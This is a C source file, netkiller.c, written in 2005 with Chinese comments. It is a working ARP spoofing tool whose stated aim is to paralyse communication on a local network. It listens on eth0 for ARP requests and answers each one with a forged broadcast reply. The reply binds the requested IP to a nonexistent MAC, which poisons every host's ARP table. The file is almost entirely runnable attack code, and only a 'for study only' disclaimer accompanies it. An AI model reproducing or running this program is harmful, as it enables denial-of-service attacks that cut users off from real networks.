netkiller.c

基于ARP协议的两个程序: 1:局域网攻击器 2:空闲IP查询

/********************************************/
/**创建者：杨希          日期：2005/04/14  **/
/**文件名：netKiller.c   版本：1.0.2       **/
/**描  述：使局域网内通信瘫痪              **/
/**其  它：请慎用此程序，其只为学习网络知识**/
/**        不可以其来做非法事，如因用此程序**/
/**        而造成严重后果，本人概不负责，切**/
/**        记，切记。                      **/
/********************************************/

#include<stdio.h>
#include<string.h>   
#include<unistd.h> 
#include<sys/socket.h>    
#include<arpa/inet.h>     
#include<netdb.h> 
#include<netinet/if_ether.h>  
#include<unistd.h>  
#include<sys/stat.h>
#include <net/if_arp.h>

struct etharp { 
	struct arphdr hdr; 
	unsigned char sender_mac[6]; 
	unsigned char sender_ip[4]; 
	unsigned char rcver_mac[6]; 
	unsigned char rcver_ip[4]; 
}; 

struct etharp_frame { 
	unsigned char dst[6]; 
	unsigned char src[6]; 
	unsigned short type; 
	struct etharp arp; 
};   

/* 伪造者的MAC地址 */
static unsigned char lastMAC[6] = {0x02, 0x43, 0x11, 0x11, 0x28, 0xda}; 

/*********************************************/
int main()  
{
	struct sockaddr addr;
	struct etharp_frame rcvBuffer, sndBuffer;    
	int sockfd, s, len;          

	char sourceIP[32], destIP[32];     
	int i; 

	if((sockfd = socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ARP))) == -1){
		fprintf(stderr, "creat sockek error!\n");
		exit(1);
	}
	
	/* 初始化addr */
	memset(&addr, 0, sizeof(addr));
	addr.sa_family = PF_PACKET;
	strcpy(addr.sa_data, "eth0");
	if(bind(sockfd, &addr, sizeof(addr)) < 0){
		fprintf(stderr, "bind sockek error!\n");
		exit(1);
	}
	
	/* 开始接受ARP请求 */
   	while(1){  
     		len = sizeof(struct sockaddr);  
     		s = recvfrom(sockfd, &rcvBuffer, sizeof(struct etharp_frame), 0, 
     		            &addr, &len);	
     		if(s == -1)
     			continue;
     			
     		if(ntohs(rcvBuffer.arp.hdr.ar_op) != ARPOP_REQUEST)
     			continue;	
    		
     		/* 打印请求端信息 */
     		strcpy(sourceIP, inet_ntoa(*(struct in_addr*)(rcvBuffer.arp.sender_ip)));   		
		printf("%s  at ", sourceIP);
		printf("%.2x", rcvBuffer.arp.sender_mac[0]);
		for(i = 1; i < ETH_ALEN; i++){
			printf(":%.2x", rcvBuffer.arp.sender_mac[i]);
		}
		strcpy(destIP, inet_ntoa(*(struct in_addr*)(rcvBuffer.arp.rcver_ip)));
		printf("\nrequst for %s 's MAC", destIP);
		printf("\n");	
		/* 具体制作ARP欺骗恢复包,先全部复制 */
		memcpy(&sndBuffer, &rcvBuffer, sizeof(struct etharp_frame));
		
		/* 将ARP回应包的目的MAC地址置为ARP请求广播地址，注意要复制两次 */
		memset(sndBuffer.dst, 0xff, 6);
		memset(sndBuffer.arp.rcver_mac, 0, 6);
		
		/* 将ARP回应包的源MAC地址置为不存在的MAC地址，注意要复制两次 */
		memcpy(sndBuffer.src, lastMAC, 6);
		memcpy(sndBuffer.arp.sender_mac, lastMAC, 6);
		
		/* 将ARP回应包的源IP地址置为ARP请求包所请求的IP*/
		memcpy(sndBuffer.arp.sender_ip, rcvBuffer.arp.rcver_ip, 4);
		
		/* 将ARP回应包的目的IP地址置为ARP请求包的源IP*/
		memcpy(sndBuffer.arp.rcver_ip, rcvBuffer.arp.sender_ip, 4);
		printf("reply:\n");
		printf("%s at ", inet_ntoa(*(struct in_addr*)(sndBuffer.arp.sender_ip)));
		printf("%.2x", sndBuffer.arp.sender_mac[0]);
		for(i = 1; i < ETH_ALEN; i++){
			printf(":%.2x", sndBuffer.arp.sender_mac[i]);
		}
		printf("\n");
		printf("requst for %s 's MAC", sourceIP);
		printf("\n\n");
		
		/* 发送伪造的ARP请求包给该次的ARP请求这以使其强制更新其ARP表 */
		if(sendto(sockfd, &sndBuffer, sizeof(struct etharp_frame), 0, 
		      &addr, len) < 0){
			perror("sendto");
			exit(0);
		}
	}		
}